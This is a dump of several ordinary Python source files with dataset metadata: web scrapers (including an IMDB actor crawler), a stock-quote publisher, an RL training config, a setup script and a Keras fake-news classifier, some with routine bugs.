"turbogears.controllers", "line_number": 11, "usage_type": "name"}, {"api_name": "cherrypy.NotFound", "line_number": 28, "usage_type": "attribute"}, {"api_name": "turbogears.expose", "line_number": 17, "usage_type": "call"}, {"api_name": "cherrypy.request", "line_number": 37, "usage_type": "attribute"}, {"api_name": "cherrypy.request", "line_number": 38, "usage_type": "attribute"}, {"api_name": "cherrypy.request", "line_number": 39, "usage_type": "attribute"}, {"api_name": "cherrypy.request", "line_number": 41, "usage_type": "attribute"}, {"api_name": "cherrypy.request._resourcecontroller.get", "line_number": 45, "usage_type": "call"}, {"api_name": "cherrypy.request", "line_number": 45, "usage_type": "attribute"}, {"api_name": "cherrypy.request", "line_number": 48, "usage_type": "attribute"}]}
+{"seq_id": "232175621", "text": "import requests\nfrom bs4 import BeautifulSoup\n\nwengine_search_target = 'a'\n\ndef wengine(url):\n source_code = requests.get(url)\n plain_sourcecode = source_code.text\n wengine_soup = BeautifulSoup(plain_sourcecode, \"html.parser\")\n result = wengine_soup.findAll(wengine_search_target)\n\n resultsFile = open('results.txt', 'w')\n\n for htmlbody in result:\n if \"http\" in str(htmlbody):\n resultsFile.write(htmlbody.get('href') + \"\\n\")\n\ndef settings():\n settingsFile = open('settings.txt', 'w')\n settingsFile.write(wengine_search_target)\n def readsettings():\n settingsFile.read()\n\n\n\t\t\nwhile True:\n\twengine(input(\"Insert webpage adress: \"))", "sub_path": "main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 680, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "requests.get", "line_number": 7, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 9, "usage_type": "call"}]}
+{"seq_id": "211339999", "text": "from bs4 import BeautifulSoup\nfrom bs4 import SoupStrainer\nfrom urllib.parse import urlparse\nimport requests\nimport collections\nimport os\nimport threading\nimport time\nimport gui_build\nimport people_info\nimport url2img\n\n\nclass CrawlIMDB:\n def __init__(self):\n self.host_name_ = 'http://www.imdb.com' # the base address of the website\n self.seed_url_ = []\n self.seed_url_.append('http://www.imdb.com/name/nm0914612/') # Emma Watson\n #self.seed_url_.append('http://www.imdb.com/name/nm0000129/') # Tom Cruise\n #self.seed_url_.append('http://www.imdb.com/name/nm0000138/') # Leonardo DiCaprio\n\n self.image_count_ = 0\n self.actor_queue_ = collections.deque() # store the temporaty list\n #self.actor_queue = list()\n self.actor_visited_set_ = set() # store the history\n self.movie_visited_set_ = set() # store the history\n self.LoadPreIteration() # load the previous history\n\n # self.max_actor_queue_length_ = 10000\n\n self.actor_queue_lock_ = threading.Lock()\n self.actor_visited_set_lock_ = threading.Lock()\n self.movie_visited_set_lock_ = threading.Lock()\n self.cast_list_strainer_ = SoupStrainer('table', {'class': 'cast_list'}) # for beautiful soup purpose\n self.file_lock_ = threading.Lock()\n self.close_thread_call_ = False\n self.json_file_ = open('../data/people.json', 'a')\n self.time_lock_ = threading.Lock()\n self.save_temp_file_lock_ = threading.Lock()\n\n self.sleep_commend_ = False\n self.sleep_event = threading.Event()\n self.sleep_event.set()\n\n def LoadPreIteration(self):\n if os.path.isfile('./__crawlercache/actor_visited_list.txt'):\n with open('./__crawlercache/actor_visited_list.txt', 'r') as avl_f:\n self.actor_visited_set_ = set(avl_f.read().split('\\n'))\n\n if os.path.isfile('./__crawlercache/movie_visited_list.txt'):\n with open('./__crawlercache/movie_visited_list.txt', 'r') as mvl_f:\n self.movie_visited_set_ = set(mvl_f.read().split('\\n'))\n\n if os.path.isfile('./__crawlercache/actor_visited_list.txt'):\n with open('./__crawlercache/actor_queue.txt', 'r') as avq_f:\n self.actor_queue_ = collections.deque(avq_f.read().split('\\n'))\n\n def RunThread(self, num_of_threading=-1):\n if num_of_threading > len(self.seed_url_) or num_of_threading == -1:\n num_of_threading = len(self.seed_url_)\n self.start_time = time.time()\n for i in range(num_of_threading):\n threading.Thread(target=self.DFSCrawl, args=(self.seed_url_[i],)).start()\n\n gui_build.GUI_Window(self.ExitFunction, self.PauseFunction) # manully exit\n self.ExitFunction()\n\n def DFSCrawl(self, seed_url):\n '''\n :param img_url: the url contain the image of the actor or the actress\n :return:\n '''\n with self.actor_visited_set_lock_, self.actor_queue_lock_:\n if seed_url not in self.actor_visited_set_:\n self.actor_visited_set_.add(seed_url)\n\n self.actor_queue_.append(\n seed_url) # because it is the seed, so it will be pushed here anyway to check if the seed is crawl over or not\n\n while len(self.actor_queue_) > 0:\n if self.close_thread_call_:\n return\n\n self.sleep_event.wait()\n\n with self.time_lock_:\n curr_epsilon = time.time() - self.start_time\n if curr_epsilon > 60 * 60 * 2:\n self.SaveTempData()\n self.start_time = time.time()\n\n with self.actor_queue_lock_:\n curr_actor_url = self.actor_queue_.pop()\n path = urlparse(curr_actor_url).path\n while os.path.dirname(path) != '/':\n path = os.path.dirname(path)\n if path == \"/name\":\n self.CrawActor(curr_actor_url)\n elif path == \"/title\":\n self.CrawMovie(curr_actor_url)\n\n def CrawActor(self, 
curr_actor_url):\n '''\n :param img_url: the url contain the image of the actor or the actress\n :return:\n '''\n\n try:\n source_code = requests.get(curr_actor_url)\n plain_text = source_code.text\n soup = BeautifulSoup(plain_text, \"html.parser\")\n\n link = soup.find('img', {'id': 'name-poster'})\n if link:\n # make sure the link is valid, which means this celebrity has a picture\n img_url = link.get('src')\n actor_name = link.get('alt').replace(' Picture', '')\n born_info = soup.find('div', {'id': 'name-born-info'})\n curr_actor_info = people_info.PeopleInfo()\n\n curr_actor_info.SetName(actor_name)\n curr_actor_info.SetLink(curr_actor_url)\n birth_day = \"\"\n birth_year = \"\"\n location = \"\"\n\n if born_info is not None:\n born_info_list = born_info.findAll('a')\n for link in born_info_list:\n curr_href = link.get(\"href\")\n if curr_href.find(\"birth_monthday\") != -1:\n birth_day = link.text\n elif curr_href.find(\"birth_year\") != -1:\n birth_year = link.text\n elif curr_href.find(\"birth_place\") != -1:\n location = link.text\n\n curr_actor_info.SetBirthYear(birth_year)\n curr_actor_info.SetBirthDay(birth_day)\n curr_actor_info.SetLocation(location)\n\n with self.file_lock_:\n curr_actor_info.JsonDump(self.json_file_)\n\n url2img.url2img('../data/IMDB', actor_name, img_url)\n\n # if len(self.actor_queue_) < self.max_actor_queue_length_:\n # if the current queue is larger than the defined maximum length,\n # the program would not adding new link ustil it reduce to the maximum length\n node = soup.find_all('div', {'class': 'filmo-category-section'})\n for item in node:\n films_class = item.find_all('b')\n for single_movie in films_class:\n if self.close_thread_call_:\n return\n self.sleep_event.wait()\n\n # in case the name of the movie is unprintable\n try:\n print(single_movie.text)\n finally:\n pass\n\n movie_url = self.host_name_ + (single_movie.contents[0].get('href'))\n movie_url = self.RemoveQuestionMark(movie_url)\n print(movie_url)\n #with self.actor_queue_lock_:\n self.actor_queue_.append(movie_url)\n #self.CrawMovie(movie_url)\n except:\n print(\"some error encountered\")\n\n def CrawMovie(self, movie_url):\n '''\n :param movie_url: the url contains the list of actors or actresses\n :return:\n '''\n with self.movie_visited_set_lock_:\n if movie_url in self.movie_visited_set_:\n return\n else:\n self.movie_visited_set_.add(movie_url)\n\n self.sleep_event.wait()\n\n source_code = requests.get(movie_url)\n plain_text = source_code.text\n soup = BeautifulSoup(plain_text, \"html.parser\", parse_only=self.cast_list_strainer_)\n # cast_list = soup.find_all('table',{'class':'cast_list'})\n cast_list_urls = soup.find_all('a', {'itemprop': 'url'})\n for item in cast_list_urls:\n if self.close_thread_call_:\n return\n self.sleep_event.wait()\n\n # if the seeds are changed, the lines below should be commended out\n actor_name = item.text\n\n if actor_name[0] == ' ':\n actor_name = actor_name[1:]\n\n if actor_name[-1] == '\\n':\n actor_name = actor_name[:-1]\n\n actor_url = self.host_name_ + item.get('href')\n actor_url = self.RemoveQuestionMark(actor_url)\n\n self.actor_visited_set_lock_.acquire()\n self.actor_queue_lock_.acquire()\n try:\n if actor_url not in self.actor_visited_set_:\n self.actor_queue_.append(actor_url)\n self.actor_visited_set_.add(actor_url)\n finally:\n self.actor_visited_set_lock_.release()\n self.actor_queue_lock_.release()\n\n def SaveTempData(self):\n with self.save_temp_file_lock_:\n f_actor = open('./__crawlercache/actor_visited_list.txt', 'w')\n 
f_movie = open('./__crawlercache/movie_visited_list.txt', 'w')\n f_actor_q = open('./__crawlercache/actor_queue.txt', 'w')\n f_actor.write('\\n'.join(self.actor_visited_set_))\n f_movie.write('\\n'.join(self.movie_visited_set_))\n f_actor_q.write('\\n'.join(self.actor_queue_))\n f_actor.close()\n f_movie.close()\n f_actor_q.close()\n\n def RemoveQuestionMark(self, url):\n return url[:url.find('?')]\n\n def ExitFunction(self):\n self.close_thread_call_ = True\n self.sleep_event.set()\n while threading.active_count() > 1:\n time.sleep(0.1)\n self.json_file_.close()\n self.SaveTempData()\n exit()\n\n def PauseFunction(self):\n if self.sleep_event.is_set() is True:\n self.sleep_event.clear()\n print(\"sleep\")\n elif self.sleep_event.is_set() is False:\n self.sleep_event.set()\n print(\"wake\")\n self.SaveTempData()\n\n\nif __name__ == '__main__':\n spider = CrawlIMDB()\n spider.RunThread()\n", "sub_path": "code/DFS_version/web_crawler_imdb.py", "file_name": "web_crawler_imdb.py", "file_ext": "py", "file_size_in_byte": 9936, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "collections.deque", "line_number": 23, "usage_type": "call"}, {"api_name": "threading.Lock", "line_number": 31, "usage_type": "call"}, {"api_name": "threading.Lock", "line_number": 32, "usage_type": "call"}, {"api_name": "threading.Lock", "line_number": 33, "usage_type": "call"}, {"api_name": "bs4.SoupStrainer", "line_number": 34, "usage_type": "call"}, {"api_name": "threading.Lock", "line_number": 35, "usage_type": "call"}, {"api_name": "threading.Lock", "line_number": 38, "usage_type": "call"}, {"api_name": "threading.Lock", "line_number": 39, "usage_type": "call"}, {"api_name": "threading.Event", "line_number": 42, "usage_type": "call"}, {"api_name": "os.path.isfile", "line_number": 46, "usage_type": "call"}, {"api_name": "os.path", "line_number": 46, "usage_type": "attribute"}, {"api_name": "os.path.isfile", "line_number": 50, "usage_type": "call"}, {"api_name": "os.path", "line_number": 50, "usage_type": "attribute"}, {"api_name": "os.path.isfile", "line_number": 54, "usage_type": "call"}, {"api_name": "os.path", "line_number": 54, "usage_type": "attribute"}, {"api_name": "collections.deque", "line_number": 56, "usage_type": "call"}, {"api_name": "time.time", "line_number": 61, "usage_type": "call"}, {"api_name": "threading.Thread", "line_number": 63, "usage_type": "call"}, {"api_name": "gui_build.GUI_Window", "line_number": 65, "usage_type": "call"}, {"api_name": "time.time", "line_number": 87, "usage_type": "call"}, {"api_name": "time.time", "line_number": 90, "usage_type": "call"}, {"api_name": "urllib.parse.urlparse", "line_number": 94, "usage_type": "call"}, {"api_name": "os.path.dirname", "line_number": 95, "usage_type": "call"}, {"api_name": "os.path", "line_number": 95, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 96, "usage_type": "call"}, {"api_name": "os.path", "line_number": 96, "usage_type": "attribute"}, {"api_name": "requests.get", "line_number": 109, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 111, "usage_type": "call"}, {"api_name": "people_info.PeopleInfo", "line_number": 119, "usage_type": "call"}, {"api_name": "url2img.url2img", "line_number": 145, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 186, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 188, "usage_type": "call"}, {"api_name": "threading.active_count", "line_number": 
236, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 237, "usage_type": "call"}]}
+{"seq_id": "365165137", "text": "import os\nfrom rainy import Config\nfrom rainy.agent import PpoAgent\nimport rainy.util.cli as cli\nfrom torch.optim import Adam\nfrom rainy.net import ActorCriticNet, DqnConv, LinearHead\nfrom rainy.net.init import Initializer, orthogonal\nfrom rainy.util import Device\nfrom typing import Tuple\n\n\ndef a2c_conv(state_dim: Tuple[int, int, int], action_dim: int, device: Device) -> ActorCriticNet:\n body = DqnConv(\n state_dim,\n kernel_and_strides=[(8, 1), (4, 1), (3, 1)],\n hidden_channels=(32, 64, 32),\n output_dim=256\n )\n ac_head = LinearHead(body.output_dim, action_dim, Initializer(weight_init=orthogonal(0.01)))\n cr_head = LinearHead(body.output_dim, 1)\n return ActorCriticNet(body, ac_head, cr_head, device=device)\n\n\ndef config() -> Config:\n c = Config()\n c.nworkers = 8\n c.set_parallel_env(lambda _env_gen, _num_w: ParallelRogueEnvExt(StairRewardParallel(\n [CONFIG] * c.nworkers,\n max_steps=500,\n stair_reward=50.0,\n image_setting=EXPAND,\n )))\n c.eval_env = RogueEnvExt(StairRewardEnv(\n config_dict=CONFIG,\n max_steps=500,\n stair_reward=50.0,\n image_setting=EXPAND\n ))\n c.set_optimizer(lambda params: Adam(params, lr=2.5e-4, eps=1.0e-4))\n c.set_net_fn('actor-critic', a2c_conv)\n c.max_steps = int(2e7)\n c.grad_clip = 0.5\n c.episode_log_freq = 100\n c.eval_freq = None\n c.eval_deterministic = False\n # ppo parameters\n c.nsteps = 100\n c.value_loss_weight = 0.5\n c.gae_tau = 0.95\n c.use_gae = True\n c.ppo_minibatch_size = 200\n c.ppo_clip = 0.1\n c.lr_decay = True\n return c\n\n\nif __name__ == '__main__':\n cli.run_cli(config(), PpoAgent, script_path=os.path.realpath(__file__))\n", "sub_path": "coinrun/rainy_ppo.py", "file_name": "rainy_ppo.py", "file_ext": "py", "file_size_in_byte": 1738, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "typing.Tuple", "line_number": 12, "usage_type": "name"}, {"api_name": "rainy.util.Device", "line_number": 12, "usage_type": "name"}, {"api_name": "rainy.net.DqnConv", "line_number": 13, "usage_type": "call"}, {"api_name": "rainy.net.LinearHead", "line_number": 19, "usage_type": "call"}, {"api_name": "rainy.net.init.Initializer", "line_number": 19, "usage_type": "call"}, {"api_name": "rainy.net.init.orthogonal", "line_number": 19, "usage_type": "call"}, {"api_name": "rainy.net.LinearHead", "line_number": 20, "usage_type": "call"}, {"api_name": "rainy.net.ActorCriticNet", "line_number": 21, "usage_type": "call"}, {"api_name": "rainy.net.ActorCriticNet", "line_number": 12, "usage_type": "name"}, {"api_name": "rainy.Config", "line_number": 25, "usage_type": "call"}, {"api_name": "torch.optim.Adam", "line_number": 39, "usage_type": "call"}, {"api_name": "rainy.Config", "line_number": 24, "usage_type": "name"}, {"api_name": "rainy.util.cli.run_cli", "line_number": 58, "usage_type": "call"}, {"api_name": "rainy.agent.PpoAgent", "line_number": 58, "usage_type": "argument"}, {"api_name": "rainy.util.cli", "line_number": 58, "usage_type": "name"}, {"api_name": "os.path.realpath", "line_number": 58, "usage_type": "call"}, {"api_name": "os.path", "line_number": 58, "usage_type": "attribute"}]}
+{"seq_id": "331032641", "text": "# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu May 9 09:40:23 2019\n\n@author: ArchuBharathi\n\"\"\"\n\nfrom io import StringIO\nimport sys\nfrom nsetools import Nse\nimport pandas as pd\nimport logging\nfrom logging.config import fileConfig\nfrom nsetools import Nse\nimport pika\nimport json\nfrom pika.connection import ConnectionParameters\nfrom pika import credentials as pika_credentials, BasicProperties\nfrom pika.exceptions import AMQPError, ChannelClosed, ConnectionClosed\nimport concurrent.futures\n\n\nclass daily_stock_price_fetcher_mq:\n\n queue_name = \"NSE\"\n queue_count = int(0)\n total_msg_counter = 0\n\n def __init__(self, connection, channel, routingkey):\n\n self.nse = Nse()\n fileConfig('../properties/logging_config.ini')\n self.log = logging.getLogger()\n self.log.debug('Logger intiated ')\n self.connection = connection\n self.channel = channel\n self.routingkey = routingkey\n self._message_number_out = 0\n\n def read_stock_scan_list(self, filename):\n# =============================================================================\n# \"\"\" Read the stock code from files and return a list \"\"\"\n# =============================================================================\n self.log.debug(\"stock file used for scanning :\" + filename)\n linelist = [line.rstrip('\\n') for line in open(filename) if line[:-1]]\n return linelist\n\n def nse_live_fetch(self, stockquote):\n# =============================================================================\n# Fetch Realtime nse stock details\n# NSE.py module is modified please use that changes while updating\n# {PIP install NSE}\n# =============================================================================\n self.log.debug(\"Processing of url :\" + str(stockquote))\n try:\n response_json = self.nse.get_quote(str(stockquote))\n except BaseException as B:\n self.log.info(\"Exception Occured for: \"+str(stockquote)+\":\"+str(B))\n return\n\n self.publish_kafka(str(response_json),stockquote)\n return \"done\"\n\n def get_current_day_quotes(self, stock_scan_list):\n# =============================================================================\n# concurrent processsing of Stock fetch from NSE websites\n# =============================================================================\n self.log.debug(\"Concurrent processing of urls\")\n\n with concurrent.futures.ThreadPoolExecutor(max_workers=10) as executor:\n for x in executor.map(self.nse_live_fetch, stock_scan_list):\n pass\n\n return \"done\"\n\n def publish(self, message, stock_code):\n# =============================================================================\n# publish the response to RabbitMQ\n# =============================================================================\n\n self._message_number_out += 1\n daily_stock_price_fetcher_mq.total_msg_counter += 1\n\n if message.isspace():\n\n self.log.info(\"Response EMPTY for stockcode : %s\" % (stock_code))\n return\n\n try:\n self.channel.basic_publish(exchange='NSE',\n #routing_key=self.routingkey,\n routing_key='',\n body=message)\n self.log.debug(\"Publish kafka message #%s ,MSG : %s\" %\n (self._message_number_out, message))\n self.log.info(\"Publish kafka message #%s,StockCode : %s \" %\n (self._message_number_out, stock_code))\n except ChannelClosed:\n\n self.channel.retry_channel()\n self.channel._cached_messages.append(message)\n\n except AMQPError as err:\n\n self.log.info(\"AMQPERROR %s,StockCode : %s \" %\n (err, stock_code))\n self.channel.retry_channel()\n 
self.channel._cached_messages.append(message)\n\n return\n\n def publish_kafka(self,message,stock_code):\n# =============================================================================\n# publish the response json to Kafka queue\n# =============================================================================\n if message.isspace():\n self.log.info(\"Response EMPTY for stockcode : %s\" % (stock_code))\n return\n\n daily_stock_price_fetcher_mq.total_msg_counter += 1\n\n self._message_number_out += 1\n\n self.connection.send(self.routingkey,message)\n # json.dumps(message).encode('utf-8'))\n\n self.log.debug(\"Publish message #%s ,MSG : %s\" %\n (self._message_number_out, message))\n self.log.info(\"Publish message #%s,StockCode : %s \" %\n (self._message_number_out, stock_code))\n\n def main_workflow(self,filename):\n# =============================================================================\n# Entry method and workflow orchestration method\n# =============================================================================\n\n self.get_current_day_quotes(self.read_stock_scan_list(filename))\n self.log.info(\"All Stocks quotes published for FileId : \"+filename)\n\n return daily_stock_price_fetcher_mq.total_msg_counter\n\n\nif __name__ == \"__main__\":\n dm = daily_stock_price_fetcher_mq()", "sub_path": "stream/daily_stock_price_mq.py", "file_name": "daily_stock_price_mq.py", "file_ext": "py", "file_size_in_byte": 5372, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "nsetools.Nse", "line_number": 31, "usage_type": "call"}, {"api_name": "logging.config.fileConfig", "line_number": 32, "usage_type": "call"}, {"api_name": "logging.getLogger", "line_number": 33, "usage_type": "call"}, {"api_name": "concurrent.futures.futures.ThreadPoolExecutor", "line_number": 70, "usage_type": "call"}, {"api_name": "concurrent.futures.futures", "line_number": 70, "usage_type": "attribute"}, {"api_name": "concurrent.futures", "line_number": 70, "usage_type": "name"}, {"api_name": "pika.exceptions.ChannelClosed", "line_number": 98, "usage_type": "name"}, {"api_name": "pika.exceptions.AMQPError", "line_number": 103, "usage_type": "name"}]}
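get_current_day_quotes in the record above fans the NSE requests out with `ThreadPoolExecutor.map` and drains the iterator so exceptions surface. The same fan-out shape without the NSE dependency (`fetch` is a stand-in for `nse.get_quote`):

```python
import concurrent.futures

def fetch(symbol: str) -> str:
    # Stand-in for an I/O-bound call such as nse.get_quote(symbol).
    return symbol.upper()

symbols = ["infy", "tcs", "sbin"]
with concurrent.futures.ThreadPoolExecutor(max_workers=10) as executor:
    for quote in executor.map(fetch, symbols):
        print(quote)
```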
+{"seq_id": "424487717", "text": "import os, sys\nfrom datetime import datetime\nfrom math import sqrt\n\nfilePath = r'D:\\PythonRMSProjects\\roxarAPI\\\\'\n#startCell = 1 # № ячейки\n#countCell = 14000 #количество ячеек для расчета\nlenLineInFile = 14 #длина строки в файле фиксированная, чтобы можно было вычислить смещение при чтении из него. \n\ntry: \n startCell = int(sys.argv[1])\n countCell = int(sys.argv[2])\nexcept IndexError:\n startCell = 99286\n countCell = 14183\n\n \ndef getLists():\n global ch_prop_value \n file = open(filePath + 'ch_prop_value.txt', 'r')\n file.seek(startCell)\n ch_prop_value = [int(item) for item in list(file.read(countCell))]\n \n file = open(filePath + 'cell_indices.txt', 'r')\n file.seek(startCell * (lenLineInFile + 2)) # длина данных + \\r\\n, отсюда +2 \n cells = file.read(countCell * (lenLineInFile + 1))\n cells = cells.split('\\n')[:-1]\n global cell_indices\n cell_indices = []\n global cell_coord_indices\n cell_coord_indices = {}\n index = 0\n \n for item in cells:\n x = item.split()\n cell_indices.append([int(x[0]), int(x[1]), int(x[2])])\n cell_coord_indices['%s %s %s' % (x[0], x[1], x[2])] = index \n index += 1\n \ndef spCalcDistance():\n for ind in range(countCell):\n if ch_prop_value[ind] == 2:\n wt = 1.0\n else:\n try:\n max = 100\n cell_ind = cell_indices[ind]\n except IndexError:\n print('Index: ', ind)\n raise\n for i in range(-15, 15):\n for j in range(-15, 15):\n if cell_ind[0]+i >=0 and cell_ind[1]+j >=0:\n try:\n index = cell_coord_indices['%s %s %s' % (cell_ind[0]+i, cell_ind[1]+j, cell_ind[2])]\n #if ch_prop_value[gi.get_cell_numbers([cell_ind[0]+i, cell_ind[1]+j, cell_ind[2]])] == 2:\n if ch_prop_value[index] == 2: \n dist = sqrt(i**2 + j**2)\n if dist < max:\n max = dist\n except KeyError:\n #print('KeyError: ', '%s %s %s' % (cell_ind[0]+i, cell_ind[1]+j, cell_ind[2]))\n pass\n \n wt = 1.0 - max/(15*sqrt(2))\n if wt > 1:\n wt = 1\n if wt < 0:\n wt = 0\n #print(ind, wt)\n lWeight.append(wt)\n \nif __name__ == '__main__':\n startTime = datetime.now()\n print('Hello from child %i\\n' % os.getpid(), 'Start time: ', startTime)\n getLists()\n lWeight = []\n \n spCalcDistance()\n with open('%sweight_%s.txt' % (filePath, startCell), 'w') as f:\n f.writelines([str(item) + '\\n' for item in lWeight])\n \n print('Bye from child %i\\n' % os.getpid(), 'End time: ', datetime.now(), 'Duration: ', datetime.now() - startTime) \n", "sub_path": "child.py", "file_name": "child.py", "file_ext": "py", "file_size_in_byte": 3084, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "sys.argv", "line_number": 11, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 12, "usage_type": "attribute"}, {"api_name": "math.sqrt", "line_number": 58, "usage_type": "call"}, {"api_name": "math.sqrt", "line_number": 65, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 74, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 74, "usage_type": "name"}, {"api_name": "os.getpid", "line_number": 75, "usage_type": "call"}, {"api_name": "os.getpid", "line_number": 83, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 83, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 83, "usage_type": "name"}]}
+{"seq_id": "560785599", "text": "import os\nimport stat\nfrom datetime import datetime\nfrom setuptools import setup\n\ndef read(fname):\n\t return open(os.path.join(os.path.dirname(__file__), fname)).read()\n\n\ndef most_recent_mod(directory):\n\tmod=0;\n\tfor dirpath, dirnames, filenames in os.walk(directory): \n\t\tfor filename in filenames:\n\t\t\tfname=os.path.join(dirpath,filename)\n\t\t\tstats=os.stat(fname)\n\t\t\tmod=max(mod,stats[stat.ST_MTIME])\n\treturn mod\n\nsrc='src/stagyy'\n\nver=datetime.fromtimestamp(most_recent_mod(src)).strftime('%Y.%m.%d.%H.%M')\n\nsetup(\n\tname='stagyy',\n#\tinstall_requires=['of_xml>=0.0.1','of_util>=0.0.1'],\n\tdescription='Python modules in support of StagYY',\n\tauthor='Robert I. Petersen',\n\tauthor_email='rpetersen@ucsd.edu', \n\tversion='0.5.0',\n\tscripts=['src/scripts/pardiff.py'],\n\tpackage_dir={'stagyy': src},\n\tpackages=['stagyy','stagyy.ic','stagyy.image'], \n\tlicense='GPL 2.0', \n\tclassifiers=[\n'Development Status :: 4 - Beta',\n'Intended Audience :: Developers',\n'License :: OSI Approved :: GNU General Public License (GPL)',\n'Programming Language :: Python'\n\t],\n\tlong_description=read('README')\n)\n", "sub_path": "setup.py", "file_name": "setup.py", "file_ext": "py", "file_size_in_byte": 1081, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "os.path.join", "line_number": 7, "usage_type": "call"}, {"api_name": "os.path", "line_number": 7, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 7, "usage_type": "call"}, {"api_name": "os.walk", "line_number": 12, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 14, "usage_type": "call"}, {"api_name": "os.path", "line_number": 14, "usage_type": "attribute"}, {"api_name": "os.stat", "line_number": 15, "usage_type": "call"}, {"api_name": "stat.ST_MTIME", "line_number": 16, "usage_type": "attribute"}, {"api_name": "datetime.datetime.fromtimestamp", "line_number": 21, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 21, "usage_type": "name"}, {"api_name": "setuptools.setup", "line_number": 23, "usage_type": "call"}]}
+{"seq_id": "127268223", "text": "import tensorflow as tf\nfrom tensorflow import keras\nfrom keras.preprocessing.text import one_hot\nfrom keras.preprocessing.sequence import pad_sequences\nfrom keras.layers import Embedding,RNN,LSTM,Dense\nfrom keras import Sequential\nimport numpy as np\nimport math\nimport pandas as pd\n\ndf=pd.read_csv(r\"Fake.csv\",names=[\"title\",\"text\",\"sub\",\"date\"])\n\nx=[]\ny=[]\n\n\nfor i in range(1,501):\n x.append(df.text[i])\n y.append([0,1])\n \nx_train=np.array(x[0:400])\nx_test=np.array(x[400:500])\ny_train=np.array(y[0:400])\ny_test=np.array(y[400:500])\n\n\ndf=pd.read_csv(r\"\\True.csv\",names=[\"title\",\"text\",\"sub\",\"date\"])\n\n\nx=[]\ny=[]\nfor i in range(1,501):\n x.append(df.text[i])\n y.append([1,0])\n\nx_train=np.append(x_train,x[0:400],axis=0)\nx_test=np.append(x_test,x[400:500],axis=0)\n\nprint(x_train.shape)\n\ny_train=np.append(y_train,y[0:400],axis=0)\ny_test=np.append(y_test,y[400:500],axis=0)\n\n\nvocab_size=50\n\nencoded_docs=[one_hot(d,vocab_size) for d in np.array(x_train)]\npadded_docs=pad_sequences(encoded_docs,100,padding='post')\n\nprint(padded_docs)\nembed_dim = 128\nlstm_out = 200\n#batch_size = 32\n\nmodel = Sequential()\nmodel.add(Embedding(embed_dim, embed_dim,input_length = padded_docs.shape[1], dropout = 0.2))\nmodel.add(LSTM(lstm_out, dropout_U = 0.2, dropout_W = 0.2))\n\nmodel.add(Dense(2,activation='softmax')) \nmodel.compile(loss='categorical_crossentropy',optimizer='adam',metrics = ['accuracy'])\nprint(model.summary())\n\nencoded_test=[one_hot(d,vocab_size) for d in x_test]\npadded_test=pad_sequences(encoded_test,100,padding='post')\n\n# fit model\nmodel.fit(padded_docs, y_train, epochs=2, verbose=0)\n\n#test model\ny=model.predict(padded_test)\nerr=0\n#print(y_test)\nl=y_test.shape[0]\n\nfor i in range(l):\n if y[i][0]>y[i][1]:\n y[i][0]=1\n y[i][1]=0\n else:\n y[i][0]=0\n y[i][1]=1\n err+=(y_test[i][0]-y[i][0]+y_test[i][0]-y[i][0])/2\nerr=err/l\nacc=1-err \nprint(\"Accuracy: \",acc*100,\"%\")\ninput=None\nprint(input)\ninp=input(\"Enter A News To Test: \")\ninp=np.array([inp])\nencoded_test=[one_hot(d,vocab_size) for d in inp]\npadded_test=pad_sequences(encoded_test,100,padding='post')\noutput=model.predict(padded_test)\nif(output[0][0]>output[0][1]):\n print(\"True News!!! Wow\")\nelse:\n print(\"Oops!!! 
Fake News\")\n", "sub_path": "Fake_News_Detection.py", "file_name": "Fake_News_Detection.py", "file_ext": "py", "file_size_in_byte": 2246, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "pandas.read_csv", "line_number": 11, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 21, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 22, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 23, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 24, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 27, "usage_type": "call"}, {"api_name": "numpy.append", "line_number": 36, "usage_type": "call"}, {"api_name": "numpy.append", "line_number": 37, "usage_type": "call"}, {"api_name": "numpy.append", "line_number": 41, "usage_type": "call"}, {"api_name": "numpy.append", "line_number": 42, "usage_type": "call"}, {"api_name": "keras.preprocessing.text.one_hot", "line_number": 47, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 47, "usage_type": "call"}, {"api_name": "keras.preprocessing.sequence.pad_sequences", "line_number": 48, "usage_type": "call"}, {"api_name": "keras.Sequential", "line_number": 55, "usage_type": "call"}, {"api_name": "keras.layers.Embedding", "line_number": 56, "usage_type": "call"}, {"api_name": "keras.layers.LSTM", "line_number": 57, "usage_type": "call"}, {"api_name": "keras.layers.Dense", "line_number": 59, "usage_type": "call"}, {"api_name": "keras.preprocessing.text.one_hot", "line_number": 63, "usage_type": "call"}, {"api_name": "keras.preprocessing.sequence.pad_sequences", "line_number": 64, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 89, "usage_type": "call"}, {"api_name": "keras.preprocessing.text.one_hot", "line_number": 90, "usage_type": "call"}, {"api_name": 